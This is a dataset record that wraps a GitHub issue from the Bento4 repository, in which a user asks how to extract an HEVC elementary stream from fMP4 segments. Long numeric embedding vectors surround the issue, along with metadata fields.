-0.012468035332858562, 0.0024676320608705282, -0.006749754771590233, 0.009554309770464897, -0.02309899404644966, 0.012407803907990456, -0.001363691408187151, -0.019439896568655968, -0.008048508316278458, 0.020719828084111214, 0.044692184776067734, 0.004645397420972586, -0.025990132242441177, 0.004656690638512373, 0.014131946489214897, 0.029995564371347427, -0.005383240059018135, 0.01684991829097271, 0.004890089854598045, 0.020509015768766403, 0.005763454828411341, 0.005770983640104532, -0.0035856894683092833, -0.0041221315041184425, -0.015178478322923183, 0.019485069438815117, 0.009795238263905048, -0.00108605925925076, -0.008680945262312889, 0.021051103249192238, 0.018280429765582085, 0.006350717507302761, 0.016669221222400665, -0.014854731038212776, -0.0223159771412611, -0.0036816843785345554, 0.024830665439367294, -0.001916132285259664, -0.004400704521685839, -0.011511852033436298, 0.016864975914359093, -0.017241425812244415, -0.0014342758804559708, -0.0027876149397343397, -0.01115798857063055, -0.015780799090862274, 0.017090845853090286, -0.012460506521165371, 0.008936931379139423, 0.007273020688444376, 0.0200271587818861, -0.006738461088389158, 0.01913873478770256, 0.006245311349630356, 0.009479019790887833, 0.009381142444908619, -0.007717232219874859, 0.00983288325369358, -0.003389935474842787, -0.02240632474422455, -0.0069793895818293095, 0.020343376323580742, 0.010774008929729462, 0.005691929254680872, -0.016563815996050835, -0.003427580464631319, -0.005526291206479073, -0.00772476103156805, -0.002452573971822858, -0.0020497720688581467, 0.020298203453421593, 0.010728835128247738, 0.02600518986582756, 0.004159776493906975, 0.0028045549988746643, -0.01950012892484665, 0.009750064462423325, -0.0059027415700256824, -0.0017137902323156595, -0.01934954710304737, 0.0029513707850128412, 0.0001725789625197649, 0.013386574573814869, 0.009750064462423325, -0.015103188343346119, 0.0042727114632725716, 0.00629048515111208, -0.01523870974779129, -0.009787709452211857, 0.007867812179028988, 0.001392866251990199, -0.0028723161667585373, 0.0016036784509196877, 0.005823686718940735, -0.0075930035673081875, -0.020659595727920532, -0.018762284889817238, -0.0029607820324599743, -0.011180575005710125, -0.005104666575789452, -0.01668427884578705, -0.004543755669146776, 0.012114171870052814, 0.01913873478770256, -0.0211715679615736, 0.011029995046555996, 0.027842268347740173, -0.030552709475159645, -0.037524569779634476, -0.012626145035028458, -0.00034351093927398324, -0.007043385878205299, 0.0064900037832558155, 0.02356579154729843, 0.0003468048817012459, 0.0030078382696956396, 0.002697266638278961, -0.0022210569586604834, 0.008018392138183117, 0.0020911816973239183, 0.01541940588504076, -0.0025222173426300287, -0.012754137627780437, -0.003410640172660351, -0.003436991712078452, -0.018656879663467407, 0.007201495114713907, 0.017587760463356972, 0.011850656941533089, 0.006316836923360825, 0.016910148784518242, -0.02439398318529129, -0.031170088797807693, -0.010209333151578903, -0.03141101822257042, -0.005816157907247543, 0.002635152544826269, 0.009012221358716488, -0.011060111224651337, -0.007995805703103542, -0.012129230424761772, 0.007314430084079504, -0.003911319188773632, 0.014832143671810627, -0.003092539496719837, 0.00920044630765915, -0.010969762690365314, 0.006889041513204575, 0.0009034808608703315, 0.0025862138718366623, 0.037313759326934814, 0.022767717018723488, -0.022948414087295532, -0.00811626948416233, -0.03719329461455345, 0.001968835247680545, 0.005499939434230328, 0.011014937423169613, -0.01852135732769966, -0.017512470483779907, -0.03376006707549095, 0.003260059980675578, 0.002815848682075739, -0.02793261595070362, -0.006192608270794153, -0.002857258077710867, 0.0062754275277256966, -0.017120961099863052, 0.021502843126654625, 0.00998346321284771, 0.02236115001142025, 0.003036072012037039, -0.029257720336318016, 0.010819182731211185, 0.0019481305498629808, 0.005070785991847515, -0.0027047956828027964, -0.025101710110902786, 0.018190080299973488, 0.01924414187669754, 0.008236733265221119, 0.004291533958166838, -0.007389720529317856, -0.044601839035749435, 0.015133303590118885, 0.006143669597804546, 0.029363127425312996, -0.0027970261871814728, 0.01248309388756752, 0.022933354601264, -0.001959424000233412, 0.014636389911174774, -0.0006493768305517733, 0.00044327028444968164, -0.01471920870244503, -0.001749553019180894, -0.011022466234862804, 0.000755253538955003, 0.012498151510953903, -0.024951128289103508, -0.0001611678017070517, -0.013499509543180466, 0.004171069711446762, 0.016774628311395645, 0.008537894114851952, 0.018235255032777786, -0.02081017568707466, -0.0206897109746933, -0.017241425812244415, 0.006328130140900612, -0.003064305754378438, -0.013552212156355381, 0.003657215042039752, -0.008417429402470589, -0.0037400342989712954, 0.013514567166566849, -0.01474179606884718, -0.000256456813076511, -0.01680474355816841, 0.023731429129838943, -0.0143051128834486, 0.010593312792479992, -0.019168851897120476, 0.007510184310376644, -0.0032468843273818493, -0.019334489479660988, -0.002145766979083419, 0.01638311892747879, -0.005484881345182657, -0.0051950146444141865, -0.01684991829097271, -0.03541645035147667, -0.0001551681343698874, -0.019981984049081802, 0.004871267359703779, -0.006700816098600626, 0.01448580902069807, 0.02007233165204525, 0.011248336173593998, 0.025824494659900665, 0.01076648011803627, -0.013687734492123127, 0.0154946967959404, 0.023520618677139282, 0.0166391059756279, -0.0023170518688857555, 0.00235281465575099, 0.0034896947909146547, -0.011142930015921593, 0.015720566734671593, 0.006147434003651142, 0.009448903612792492, 0.011835599318146706, 0.010171688161790371, 0.009328439831733704, 0.02085534855723381, -0.006414713803678751, 0.010653545148670673, -0.003201710293069482, 0.013108001090586185, -0.009381142444908619, 0.005146076437085867, 0.016368061304092407, 0.009034808725118637, 0.01596149429678917, 0.014839672483503819, 0.00650129746645689, 0.0013571034651249647, -0.004359295126050711, -0.004547520074993372, 0.007325723767280579, 0.011722663417458534, 0.005710751749575138, -0.009554309770464897, 0.0032562955748289824, 0.011557025834918022, -0.005759690422564745, 0.011293510906398296, -0.005571465007960796, -0.002471396466717124, 0.011504322290420532, -0.031380899250507355, 0.027782035991549492, 0.011587142013013363, 0.0037720324471592903, -0.005319243296980858, 0.002716089366003871, -0.007235375698655844, 0.018626762554049492, 0.002561744535341859, -0.02496618777513504, -0.017392005771398544, -0.019650708884000778, 0.01653369888663292, -0.0051950146444141865, -0.004667984321713448, -0.007732290308922529, -0.014651447534561157, 0.004709393717348576, -0.013763024471700191, 0.007344546262174845, -0.012332512997090816, 0.011361271142959595, 0.012031353078782558, -0.01354468334466219, 0.027059251442551613, 0.015223652124404907, -0.0011547614121809602, 0.010774008929729462, -0.003261942183598876, 0.030191317200660706, -0.009358556009829044, -0.017331773415207863, -0.009682303294539452, 0.004280240274965763, 0.002439398318529129, -0.03635004535317421, 0.010879415087401867, -0.012724021449685097, 0.0042952983640134335, 0.011210691183805466, 0.013763024471700191, -0.011918418109416962, 0.014628860168159008, -0.017813630402088165, 0.005003025289624929, 0.00624154694378376, 0.005759690422564745, 0.007419836241751909, 0.019876578822731972, -0.006215195171535015, 0.01359738688915968, 0.008123798295855522, 0.012031353078782558, 0.002571155782788992, 0.009840412065386772, -0.004114602226763964, 0.006143669597804546, -0.014259939081966877, -0.0027104425244033337, -0.012836956419050694, 0.021457670256495476, 0.012964949943125248, 0.0035951007157564163, -0.02428857609629631, 0.008545422926545143, 0.013695263303816319, 0.0031471250113099813, -0.0064485943876206875, -0.02252678945660591, 0.02287312224507332, -0.014643918722867966, -0.00792804453521967, 0.0030605413485318422, 0.00681375153362751, -0.0057258098386228085, 0.009366084821522236, -0.022858064621686935, 0.007005740888416767, -0.000562793284188956, 0.004961615428328514, 0.011541967280209064, 0.03526587039232254, 0.018175022676587105, -0.003239355282858014, -0.01570550911128521, 0.012144288048148155, 0.018069617450237274, -0.005872625391930342, -0.008696002885699272, -0.01243039034307003, 0.0015001546125859022, 0.001649793703109026, 0.007133733946830034, 0.020207853987812996, 0.020930638536810875, 0.005910270381718874, -0.016458408907055855, -0.015389290638267994, 0.0029871335718780756, -0.000005488675469678128, 0.01757270283997059, 0.026456929743289948, -0.004257653374224901, -0.008590596728026867, 0.01992175169289112, -0.00472068740054965, -0.005387004464864731, -0.0019707176834344864, 0.004773390479385853, -0.007574181072413921, 0.02272254228591919, 0.01632288657128811, -0.00343887391500175, 0.017136020585894585, 0.0004804447526112199, -0.0037419165018945932, -0.001916132285259664, 0.028474703431129456, 0.012046410702168941, 0.01391360443085432, 0.01523870974779129, -0.011368800885975361, -0.006493768654763699, 0.017768455669283867, 0.011850656941533089, 0.009855469688773155, 0.005127253942191601, -0.0026050363667309284, -0.017151078209280968, 0.014726737514138222, 0.003150889417156577, 0.024740315973758698, 0.0011557025136426091, 0.012889659963548183, -0.021352263167500496, -0.007487597409635782, 0.020915580913424492, 0.03249519318342209, 0.000726078636944294, -0.011120343580842018, 0.00006370245682774112, 0.006866454146802425, -0.0032148859463632107, -0.018265370279550552, 0.013108001090586185, 0.0035122816916555166, -0.016940265893936157, -0.0006164374644868076, -0.010337326675653458, 0.003213003743439913, 0.006354481913149357, -0.0025560979265719652, -0.004031783435493708, 0.017542585730552673, 0.011150459758937359, -0.01612713374197483, 0.007570416666567326, -0.0027800858952105045, -0.010058753192424774, -0.008304494433104992, 0.014764382503926754, 0.011323626153171062, 0.00167049840092659, -0.0035951007157564163, 0.011903359554708004, -0.012980007566511631, 0.0058763897977769375, -0.012678847648203373, -0.004178598988801241, -0.0009844176238402724, -0.006196372676640749, -0.01001357939094305, -0.02854999527335167, -0.013552212156355381, 0.02038855105638504, -0.005454765632748604, 0.0018624881049618125, -0.031742293387651443, -0.006689522881060839, -0.018446067348122597, -0.0007246669265441597, 0.02776697836816311, 0.0021495313849300146, -0.008568010292947292, 0.010262036696076393, -0.023430269211530685, -0.0007684292504563928, 0.017392005771398544, 0.011022466234862804, 0.016985440626740456, 0.008342139422893524, -0.007242904510349035, 0.006855160929262638, -0.020584305748343468, -0.00014952136552892625, 0.017437180504202843, 0.002941959537565708, 0.016985440626740456, 0.0026916200295090675, 0.005575229879468679, 0.012995066121220589, 0.002431869274005294, 0.016292771324515343, 0.002262466587126255, -0.018235255032777786, -0.005921564064919949, 0.002243644092231989, 0.009561838582158089, -0.014162061735987663, -0.0013476922176778316, -0.02251172997057438, 0.0006898452411405742, 0.010811653919517994, 0.0070471507497131824, 0.0005740867927670479, -0.010231920517981052, 0.03207356855273247, -0.008703531697392464, 0.013491980731487274, 0.017858805134892464, 0.010525551624596119, 0.008161443285644054, -0.00920797511935234, -0.0218341201543808, 0.004607752431184053, -0.022632194682955742, 0.007762406021356583, -0.005819922313094139, -0.018325602635741234, -0.038397934287786484, -0.017361890524625778, 0.00516113406047225, -0.0010653544450178742, -0.004596458747982979, 0.0024864545557647943, -0.003755092155188322, -0.013800669461488724, 0.014342757873237133, 0.011526909656822681, 0.01742212288081646, -0.0026709153316915035, -0.013529625721275806, 0.010299681685864925, 0.006444829981774092, 0.017512470483779907, 0.017241425812244415, -0.0013608679873868823, 0.012031353078782558, -0.009238091297447681, 0.01508060097694397, 0.008590596728026867, -0.01016415935009718, -0.0054171206429600716, 0.007860283367335796, -0.026396699249744415, -0.026125654578208923, 0.01318329107016325, 0.015991611406207085, 0.02647198922932148, 0.012739080004394054, -0.016578873619437218, -0.0021137685980647802, -0.01284448616206646, 0.023174284026026726, 0.006572823040187359, 0.0074160718359053135, -0.019981984049081802, 0.01898815482854843, -0.00883905403316021, -0.011843128129839897, -0.002725500613451004, 0.05586523190140724, 0.00699444767087698, 0.019831404089927673, 0.0019227201119065285, 0.004419527016580105, -0.005477352533489466, -0.0031960634514689445, -0.002134473528712988, -0.0031057153828442097, 0.007762406021356583, -0.004310356453061104, 0.002806437434628606, 0.01468909252434969, -0.00964465830475092, -0.007103618234395981, 0.00964465830475092, 0.0027838503010571003, 0.006629290524870157, -0.0016385001363232732, -0.015027898363769054, -0.015140833333134651, -0.003747563110664487, 0.02725500613451004, -0.009862999431788921, -0.002047889865934849, 0.015871146693825722, 0.0029174902010709047, -0.015735624358057976, 0.006185078993439674, 0.0006211430882103741, 0.03177240863442421, -0.004475994501262903, -0.016202423721551895, -0.0013806317001581192, 0.007427365519106388, 0.011941005475819111, 0.0012215813621878624, 0.015539870597422123, 0.01315317489206791, 0.0036421571858227253, -0.005808629095554352, 0.011052582412958145, -0.023806719109416008, 0.004024254158139229, -0.0004035077290609479, -0.002546686679124832, -0.009840412065386772, 0.006418478209525347, 0.010006050579249859, 0.010058753192424774, 0.006313072517514229, 0.002727382816374302, -0.010299681685864925, 0.005149840842932463, -0.0030944219324737787, 0.0037720324471592903, 0.004596458747982979, -0.018431009724736214, -0.008801409043371677, -0.00923056248575449, -0.016774628311395645, -0.007852754555642605, -0.011248336173593998, -0.017452238127589226, -0.02480054832994938, -0.0009119509486481547, 0.008025921881198883, 0.016925208270549774, -0.003892496693879366, 0.027917558327317238, -0.008184030652046204, -0.0011152341030538082, -0.025237230584025383, -0.002183411968871951, -0.009998520836234093, -0.022556904703378677, 0.012136759236454964, 0.013981365598738194, 0.010103926993906498, 0.001848371233791113, 0.004171069711446762, -0.006015676539391279, 0.0240777637809515, -0.0002776321198325604, -0.00725419819355011, -0.012023824267089367, -0.010593312792479992, -0.006102260202169418, -0.020734885707497597, 0.012656260281801224, 0.017934095114469528, 0.006222724448889494, -0.024258460849523544, -0.004619045648723841, 0.02240632474422455, 0.009004692547023296, -0.003948964178562164, -0.019259199500083923, 0.0009166565723717213, 0.005364417564123869, 0.02850482054054737, 0.018958039581775665, -0.023882010951638222, 0.006629290524870157, 0.025357695296406746, -0.0008714825380593538, 0.00045032872003503144, -0.012678847648203373, -0.00606085080653429, 0.00920044630765915, 0.014764382503926754, -0.005319243296980858, -0.014237351715564728, 0.009125156328082085, 0.02287312224507332, 0.002437516115605831, -0.004588929936289787, 0.004762096796184778, 0.016834858804941177, 0.017392005771398544, -0.011805483140051365, -0.015720566734671593, 0.03884967416524887, 0.023204399272799492, 0.011233278550207615, -0.011986179277300835, -0.0033842886332422495, 0.027842268347740173, 0.014079242944717407, -0.002253055339679122, -0.009735005907714367, -0.018596647307276726, 0.01737694814801216, 0.006441065575927496, -0.011632315814495087, 0.010299681685864925, -0.0009025397012010217, 0.02937818504869938, 0.023415211588144302, -0.0018248431151732802, -0.005605345591902733, 0.05709999054670334, -0.012573441490530968, 0.003617687849327922, -0.018235255032777786, 0.025312520563602448, -0.008854112587869167, 0.02126191556453705, -0.021548017859458923, -0.018265370279550552, -0.006433536298573017, 0.023204399272799492, 0.016578873619437218, 0.005812393501400948, -0.008786351419985294, -0.00752900680527091, 0.006674464792013168, 0.017075788229703903, 0.005522526800632477, -0.00868847407400608, 0.001066295662894845, 0.0042538889683783054, 0.0006714932969771326, 0.012053940445184708, 0.015178478322923183, -0.005281598307192326, -0.008078624494373798, -0.015050484798848629, 0.016910148784518242, 0.004220008384436369, -0.031079741194844246, -0.007784993387758732, 0.0018248431151732802, -0.007318194955587387, 0.013333871029317379, 0.020373493432998657, 0.011760309338569641, -0.005631697364151478, 0.006234017666429281, 0.0016723807202652097, 0.013672676868736744, -0.007472539320588112, -0.006806222256273031, 0.006316836923360825, 0.04616786912083626, -0.007935573346912861, -0.00012552266707643867, -0.011278452351689339, 0.008884227834641933, 0.000879011582583189, 0.001472861971706152, -0.020554188638925552, 0.0034539320040494204, 0.008244263008236885, -0.0026840909849852324, 0.015231180936098099, 0.018159965053200722, -0.0021307088900357485, 0.020418666303157806, 0.0014869788428768516, 0.004532461985945702, -0.018762284889817238, -0.005778512917459011, 0.004208714701235294 ]
140
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
Hi, I'm trying to extract the HEVC elementary stream from a DASH/HLS fMP4 segment so I can inspect it using https://github.com/virinext/hevcesbrowser for debugging purposes. For this I need to extract the payload of the `mdat` box of the segment. But it looks like that `mp42hevc` is not capable of doing this? ``` mp42hevc 1.m4s 1.hevc ERROR: no movie in file ``` What do you think, could this feature be added? I also tried ``` mp4extract --payload-only mdat 1.m4s mdat1.hevc ``` with no luck. The resulting `mdat1.hevc` is not readable. Do you have an idea for how to extract the HEVC stream in this scenario? Thanks.
How to extract ES from fMP4 segments
https://api.github.com/repos/axiomatic-systems/Bento4/issues/634/comments
0
2021-08-06T09:33:09
2021-08-06T09:37:08Z
https://github.com/axiomatic-systems/Bento4/issues/634
962,570,792
634
false
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : How to extract ES from fMP4 segments Issue date: --- start body --- Hi, I'm trying to extract the HEVC elementary stream from a DASH/HLS fMP4 segment so I can inspect it using https://github.com/virinext/hevcesbrowser for debugging purposes. For this I need to extract the payload of the `mdat` box of the segment. But it looks like that `mp42hevc` is not capable of doing this? ``` mp42hevc 1.m4s 1.hevc ERROR: no movie in file ``` What do you think, could this feature be added? I also tried ``` mp4extract --payload-only mdat 1.m4s mdat1.hevc ``` with no luck. The resulting `mdat1.hevc` is not readable. Do you have an idea for how to extract the HEVC stream in this scenario? Thanks. --- end body ---
800
[ -0.01958860084414482, 0.039823997765779495, -0.023900557309389114, -0.0094863036647439, 0.00979430042207241, -0.009932899847626686, -0.02333076298236847, 0.04703112319111824, -0.03086128830909729, 0.017001427710056305, 0.02098998799920082, -0.030368492007255554, -0.0012137001613155007, 0.03455724939703941, 0.022776369005441666, -0.004412055481225252, 0.002931745257228613, -0.003153118072077632, -0.01983499899506569, -0.006448684725910425, 0.04345836117863655, -0.020343193784356117, 0.004296556580811739, 0.010564292781054974, 0.010641292668879032, 0.01714002713561058, -0.020512592047452927, 0.02981409803032875, -0.0381300151348114, 0.014368054457008839, -0.001355186221189797, 0.05168187618255615, -0.011642281897366047, 0.007615223061293364, 0.023099765181541443, 0.019280605018138885, 0.036928825080394745, 0.043304361402988434, -0.004546803887933493, 0.007846220396459103, -0.02003519795835018, -0.041209980845451355, -0.02192937768995762, 0.010263996198773384, -0.020666589960455894, 0.029737098142504692, -0.01818721555173397, -0.0025756238028407097, -0.01818721555173397, -0.015938838943839073, 0.002346551278606057, -0.007884720340371132, -0.059043001383543015, -0.023931358009576797, -0.002473599975928664, -0.022576171904802322, 0.07244086265563965, 0.024793749675154686, -0.014660651795566082, 0.008508414030075073, -0.006475634407252073, -0.02639533206820488, 0.023838957771658897, 0.03391045704483986, 0.024855347350239754, 0.008824110962450504, -0.020851388573646545, 0.018464412540197372, -0.010749091394245625, 0.024531951174139977, -0.009432404302060604, -0.0012040752917528152, 0.010117697529494762, 0.0063639855943620205, 0.008662411943078041, -0.03603563457727432, 0.04013199359178543, 0.008908810093998909, 0.009247606620192528, 0.026456931605935097, -0.06264656782150269, 0.00935540534555912, -0.07213287055492401, 0.015499942936003208, 0.04290396720170975, -0.03782201558351517, -0.05078868567943573, -0.05491584539413452, -0.03634363040328026, 0.0035862387157976627, -0.009162907488644123, 0.02185237780213356, 0.03914640471339226, 0.0034534151200205088, 0.015754040330648422, 0.039546798914670944, -0.016832029446959496, -0.004789351485669613, -0.031338684260845184, -0.06015178933739662, -0.01880320906639099, 0.022514572367072105, 0.01609283685684204, -0.018048617988824844, 0.032555270940065384, 0.006725881714373827, 0.02728852443397045, -0.02824331447482109, 0.0013099492061883211, 0.07743041217327118, 0.003428390249609947, 0.019373003393411636, 0.004596853628754616, -0.007807720918208361, 0.024716749787330627, -0.006152237765491009, -0.02893630601465702, -0.058611806482076645, 0.019172806292772293, -0.01551534328609705, 0.03240127116441727, 0.0015438343398272991, -0.001931717968545854, 0.013035967946052551, -0.009509403258562088, 0.06307776272296906, -0.007003079168498516, 0.004042459186166525, 0.04499834403395653, -0.011911779642105103, -0.03076888807117939, -0.030969087034463882, -0.010525793768465519, -0.009440104477107525, -0.0063639855943620205, 0.01966560073196888, 0.0022965017706155777, 0.036590028554201126, -0.022006377577781677, 0.007022328674793243, -0.02098998799920082, -0.030568690970540047, 0.007230226881802082, 0.009255305863916874, -0.02544054202735424, -0.01162688247859478, 0.032308872789144516, 0.03717522323131561, -0.015215045772492886, 0.015245845541357994, 0.025455942377448082, -0.0017411448061466217, -0.013844459317624569, -0.019003408029675484, 0.03517324477434158, 0.03926960378885269, 0.01687822863459587, 0.001770982053130865, -0.011773181147873402, 0.01385985966771841, 0.0072610266506671906, -0.024886148050427437, -0.005567043554037809, 0.005347596015781164, 0.010410294868052006, -0.014175556600093842, -0.005840390920639038, -0.006456384435296059, -0.014129356481134892, 0.022529972717165947, -0.0052628968842327595, 0.007068528328090906, 0.010094597935676575, 0.009278406389057636, -0.046445928514003754, -0.05051148682832718, 0.015707841143012047, 0.006541083566844463, -0.012697171419858932, -0.021960178390145302, -0.046291932463645935, 0.009209106676280499, 0.008100317791104317, 0.017201626673340797, 0.01695522852241993, -0.01035639550536871, 0.04370475560426712, -0.03637443110346794, 0.04789351671934128, -0.02613353542983532, -0.00012957524450030178, 0.06270816177129745, 0.005451544653624296, -0.01669343002140522, 0.034742049872875214, -0.034495651721954346, -0.01288966927677393, -0.0618765726685524, 0.013836760073900223, 0.010956988669931889, -0.012989768758416176, -0.00857001356780529, 0.00017757945170160383, -0.02106698602437973, -0.01175778079777956, -0.0009004096500575542, -0.0010799140436574817, 0.04632272943854332, 0.014676051214337349, -0.031785279512405396, -0.0017401824006810784, -0.044536348432302475, 0.014221755787730217, 0.012319874949753284, -0.014637552201747894, -0.00003443910463829525, -0.025055546313524246, -0.020127596333622932, -0.02553294226527214, 0.006387085188180208, 0.02527114376425743, -0.021898578852415085, 0.01333626452833414, -0.000959121563937515, -0.030661089345812798, 0.0012069627409800887, -0.010425694286823273, -0.024762948974967003, 0.023669559508562088, 0.0013012868585065007, 0.03809921443462372, 0.0268265288323164, 0.0009942523902282119, -0.012620172463357449, 0.013228465802967548, -0.011257286183536053, 0.018048617988824844, -0.029767898842692375, 0.02413155511021614, -0.025656139478087425, -0.06042898818850517, 0.003774886718019843, -0.014560552313923836, -0.005632493179291487, -0.01240457408130169, 0.07237926870584488, 0.003282091813161969, 0.022006377577781677, -0.009078208357095718, 0.02078978903591633, 0.025933336466550827, -0.012789570726454258, 0.04151798039674759, 0.018295014277100563, -0.006079088430851698, 0.04127158224582672, 0.03175447881221771, 0.017109226435422897, -0.02149818278849125, -0.04370475560426712, -0.0007521861116401851, -0.012250576168298721, -0.001223325147293508, -0.01704762689769268, 0.01871081069111824, -0.0538378544151783, -0.003626663237810135, -0.022668570280075073, -0.005166647490113974, -0.020389392971992493, 0.005359145812690258, -0.01516884658485651, -0.03489604592323303, 0.021113187074661255, -0.024069955572485924, -0.010040698572993279, -0.0015390219632536173, 0.0043928055092692375, 0.0005024198908358812, -0.015130346640944481, -0.030306892469525337, 0.016832029446959496, 0.03329446166753769, 0.04989549517631531, 0.01258937269449234, -0.014968648552894592, 0.0190650075674057, -0.0015332469483837485, -0.05972059443593025, -0.009124407544732094, 0.01968100108206272, 0.019342204555869102, -0.02981409803032875, 0.012027278542518616, -0.012928169220685959, 0.016554832458496094, -0.01626223511993885, 0.025024745613336563, 0.025040145963430405, 0.004481354728341103, -0.036774829030036926, 0.018233414739370346, 0.04028599336743355, 0.02473215013742447, -0.05793421342968941, 0.007380375172942877, -0.024778349325060844, 0.05463864654302597, -0.03286326676607132, -0.026549331843852997, 0.05343746021389961, -0.020774388685822487, -0.028597509488463402, 0.02631833404302597, -0.012920469045639038, 0.016231436282396317, 0.01931140385568142, -0.007780771236866713, -0.028381912037730217, -0.008908810093998909, -0.023715760558843613, 0.01498404797166586, -0.04117918387055397, -0.006833680905401707, 0.0004145926795899868, -0.03468044847249985, -0.04395115375518799, -0.023577161133289337, -0.023838957771658897, 0.030522489920258522, 0.012366075068712234, 0.0036497630644589663, 0.04321196302771568, 0.010340995155274868, 0.01512264646589756, -0.03751401975750923, -0.033694859594106674, -0.03788361698389053, 0.011942579410970211, 0.021621381863951683, -0.012512372806668282, 0.022083375602960587, 0.013836760073900223, -0.01372126117348671, -0.009432404302060604, 0.014214055612683296, -0.0176636204123497, 0.028874708339571953, 0.03129248321056366, 0.03452644869685173, 0.0009384279837831855, -0.02082058973610401, 0.0008190792286768556, -0.02865910902619362, -0.009848199784755707, -0.012697171419858932, -0.015099546872079372, -0.029583100229501724, 0.02858211100101471, 0.010056097991764545, 0.005486194510012865, -0.0156077416613698, 0.01017929706722498, 0.021621381863951683, -0.005297546274960041, 0.019696399569511414, -0.04447475075721741, -0.011365084908902645, -0.020943786948919296, -0.019958198070526123, 0.0046199532225728035, 0.00996369868516922, -0.019511602818965912, 0.030399292707443237, -0.025994936004281044, -0.01534594502300024, 0.00917830690741539, 0.014006158336997032, -0.03671322762966156, 0.0283203125, -0.052852265536785126, 0.02078978903591633, 0.01931140385568142, -0.04176437854766846, 0.00492025027051568, -0.02123638428747654, 0.00019309960771352053, -0.0028354963287711143, -0.023376964032649994, -0.025378942489624023, -0.011965679004788399, 0.019419202581048012, -0.0003806648892350495, -0.054946642369031906, -0.014545152895152569, 0.028274113312363625, -0.04145637899637222, -0.015492242760956287, 0.02536354400217533, -0.011495983228087425, 0.0006910680094733834, -0.012704871594905853, 0.01481464970856905, 0.01240457408130169, 0.00110878876876086, 0.01687822863459587, 0.022760968655347824, -0.001342673902399838, 0.0035900885704904795, 0.011026288382709026, 0.006452534813433886, -0.0149994483217597, 0.017848419025540352, -0.028089314699172974, 0.029413701966404915, 0.018680009990930557, -0.0011386260157451034, 0.01171928085386753, -0.020343193784356117, 0.027935316786170006, 0.004146407824009657, -0.003239742247387767, -0.01482234988361597, -0.0026314484421163797, 0.02639533206820488, 0.028258712962269783, -0.009370804764330387, 0.006510284263640642, 0.05001869425177574, -0.04293476417660713, 0.005351445637643337, -0.04413595423102379, -0.00917830690741539, -0.027658119797706604, 0.02955230139195919, 0.018818609416484833, -0.002184852957725525, -0.03505004569888115, -0.01686282828450203, -0.00110878876876086, -0.03541964292526245, 0.015392144210636616, 0.00022714769875165075, -0.0069222296588122845, 0.0010645142756402493, -0.012258275412023067, -0.04924870282411575, -0.026164334267377853, 0.001282999524846673, -0.03748321905732155, -0.006152237765491009, 0.06856010854244232, -0.004585303366184235, 0.01276647113263607, -0.014183256775140762, -0.010217796079814434, -0.01800241693854332, 0.020404793322086334, 0.02736552245914936, 0.005131998099386692, -0.011827080510556698, 0.008477614261209965, 0.048571109771728516, 0.0077307214960455894, 0.03505004569888115, -0.008731711655855179, -0.04028599336743355, -0.005432295147329569, 0.017817620187997818, -0.012835769914090633, 0.005740291904658079, -0.020527992397546768, 0.006544933654367924, 0.00587889039888978, 0.021913977339863777, 0.029860297217965126, -0.02046639285981655, -0.056948624551296234, 0.013590361922979355, -0.04490594565868378, 0.0007011741399765015, -0.03059948980808258, 0.011519083753228188, 0.011211086064577103, -0.0003022219461854547, -0.03785281628370285, 0.00022474146680906415, -0.001876855967566371, -0.010587392374873161, -0.001877818489447236, 0.008161917328834534, -0.02594873681664467, -0.004119458142668009, -0.000021686108084395528, 0.011703881435096264, 0.01503024809062481, -0.009555603377521038, 0.0002637223224155605, -0.004897150211036205, 0.004643052816390991, 0.00825431663542986, -0.004046308808028698, 0.010749091394245625, -0.04967989772558212, 0.04441314935684204, -0.008238916285336018, -0.021113187074661255, 0.012905069626867771, -0.050234291702508926, -0.004600703250616789, -0.018680009990930557, -0.026903526857495308, 0.008262015879154205, -0.008516114205121994, -0.008200417272746563, -0.006748981773853302, 0.021544381976127625, 0.023638760671019554, 0.019018806517124176, -0.0027584971394389868, -0.011680781841278076, 0.0008229291415773332, 0.0006578621105290949, 0.008939609862864017, 0.0021020786371082067, 0.0076922220177948475, -0.015553842298686504, -0.004897150211036205, 0.011503683403134346, 0.007961719296872616, 0.012573972344398499, -0.01451435312628746, 0.0002596317499410361, 0.026010336354374886, 0.012643272057175636, 0.004731602035462856, -0.03766801953315735, 0.012858869507908821, 0.03181607648730278, -0.006194587331265211, -0.03951599821448326, 0.023099765181541443, -0.016370033845305443, -0.0189726073294878, -0.057472217828035355, 0.005609393119812012, 0.00039317726623266935, 0.0020462542306631804, 0.007838520221412182, -0.0008561350987292826, -0.011442083865404129, -0.009409304708242416, -0.006637332960963249, 0.023715760558843613, 0.013328565284609795, 0.016986027359962463, 0.024454953148961067, 0.0281355157494545, 0.0075921230018138885, 0.004111758433282375, -0.010102298110723495, 0.009979099035263062, 0.02157518081367016, 0.005663292482495308, -0.020497191697359085, 0.02798151597380638, -0.00474315183237195, 0.011734681203961372, -0.006248486693948507, 0.008854910731315613, 0.004258057102560997, 0.01333626452833414, 0.016216035932302475, 0.021559782326221466, 0.0038980855606496334, 0.03006049618124962, 0.0429963655769825, 0.015107247047126293, 0.004050158895552158, -0.005243646912276745, 0.03560443967580795, -0.003074193838983774, -0.016416233032941818, 0.02202177606523037, 0.02953690104186535, 0.0012117752339690924, -0.008369815535843372, -0.02544054202735424, -0.036928825080394745, -0.0037440871819853783, -0.0032031675800681114, 0.016986027359962463, -0.011195686645805836, -0.014845449477434158, 0.014652951620519161, 0.009109008125960827, -0.008516114205121994, 0.013875259086489677, 0.02430095337331295, 0.012958968989551067, -0.03960840031504631, 0.03227807208895683, -0.025224944576621056, -0.022529972717165947, -0.006691232323646545, -0.0021425033919513226, -0.022160375490784645, -0.008608512580394745, -0.04432075098156929, 0.02046639285981655, 0.012173576280474663, 0.002444725250825286, 0.07348805665969849, -0.0015986963408067822, 0.01336706429719925, 0.029244303703308105, 0.03246287256479263, 0.008608512580394745, 0.005590143147855997, -0.013952258974313736, 0.025317342951893806, -0.037113625556230545, 0.03714442253112793, -0.013097567483782768, 0.017109226435422897, 0.019988996908068657, 0.006929929833859205, -0.012558572925627232, -0.01350566279143095, -0.011942579410970211, -0.014021557755768299, 0.02245297282934189, -0.005913540255278349, -0.028628310188651085, -0.003755636978894472, -0.007307225838303566, 0.02431635372340679, -0.039977993816137314, 0.026441531255841255, 0.008893409743905067, 0.009571002796292305, -0.006671982351690531, -0.012227476574480534, 0.017340224236249924, -0.02220657467842102, 0.01764822192490101, 0.0016468208050355315, 0.008816410787403584, 0.00773457158356905, -0.014344954863190651, -0.024762948974967003, -0.023022767156362534, 